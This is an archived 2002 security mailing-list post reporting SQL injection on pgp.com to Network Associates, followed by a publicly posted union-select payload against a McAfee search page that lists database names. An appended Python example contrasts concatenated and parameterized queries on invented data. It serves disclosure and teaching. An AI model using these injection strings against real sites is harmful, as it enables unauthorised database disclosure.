Vulnerability Development mailing list archives

Re: Pgp.com was exposing ... information.


From: c c <cesarc56 () yahoo com>
Date: Thu, 7 Feb 2002 08:25:50 -0800 (PST)

After the post I received this e-mail:

-------------------start-------------------
Thank you for bringing this matter to our attention. The problem has been
corrected.

Web Support
Network Associates
websupport () nai com
www.nai.com

This e-mail and any files transmitted with it are the property of
Network Associates and/or its affiliates, are confidential, and are
intended solely for the use of the individual or entity to whom this
e-mail is addressed. If you are not one of the named recipient (s) or
otherwise have reason to believe that you have received this message in
error, please notify the sender and delete this message immediately from
your computer. Any other use, retention, dissemination forwarding, printing
or copying of this e-mail is strictly prohibited.


-----Original Message-----
From: cesarc56 () yahoo com [mailto:cesarc56 () yahoo com] 
Sent: Thursday, January 24, 2002 10:49 AM
To: websupport () nai com
Subject: Error Messages

Response Required? Yes

Phone: 0054 0343 175838551

Problem Area: Error Messages

Problem URL:
http://www.pgp.com/naicommon/partners/tsp-seek/latam/resellers/resellers.asp?Country=Argentina')%20union%20select%20'a'--

Referring URL:
http://www.pgp.com/naicommon/partners/tsp-seek/latam/resellers/resellers.asp

Problem Description: The script page referenced in the Problem URL above
allows SQL injection and cross-site scripting; this could reveal critical
customer and database information. I hope it's very important to fix that
quickly.

Please contact me as soon as possible for details.

Cesar Cerrudo.
Parana, Entre Rios.
Argentina.

-------------------end-------------------
A bit late, no?

NAI people, don't forget to check this quickly:
Go to:

http://vil.mcafee.com/advsearch.asp

and input in a search field this:

asdf') union all select '1',name  from master..sysdatabases--

and submit!
You will never learn.

Sorry.

Cesar Cerrudo.
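
Added example, not part of the original post and not NAI's code: a minimal reproduction of why the `')` in the reported Country value changes the query, next to the parameterized form that treats it as data. The table, columns, query shape and sample rows are assumptions constructed for illustration, using SQLite in place of the site's database.

```python
import sqlite3

# Decoded value of the Country parameter from the report above.
REPORTED_VALUE = "Argentina') union select 'a'--"

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE resellers (name TEXT, country TEXT);
        INSERT INTO resellers VALUES ('Constructed Reseller SA', 'Argentina');
        INSERT INTO resellers VALUES ('Constructed Reseller Ltda', 'Brazil');
    """)
    return db

def lookup_concatenated(db, country):
    # 'Before' form: the request value is pasted into the SQL text, so a
    # quote and parenthesis in it end the literal and the WHERE group, and
    # whatever follows is parsed as SQL. The trailing -- comments out the
    # leftover ') from the template.
    sql = "SELECT name FROM resellers WHERE (country = '" + country + "')"
    return [row[0] for row in db.execute(sql)]

def lookup_parameterized(db, country):
    # 'After' form: the statement text is fixed and the value is bound as
    # a parameter, so it is only ever compared as a string.
    sql = "SELECT name FROM resellers WHERE (country = ?)"
    return [row[0] for row in db.execute(sql, (country,))]

if __name__ == "__main__":
    db = make_db()
    for value in ("Argentina", REPORTED_VALUE):
        print(repr(value))
        print("  concatenated :", sorted(lookup_concatenated(db, value)))
        print("  parameterized:", lookup_parameterized(db, value))
```

With the bound parameter, the reported value matches no country and returns no rows, while the concatenated form returns the extra row supplied by the appended SELECT.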

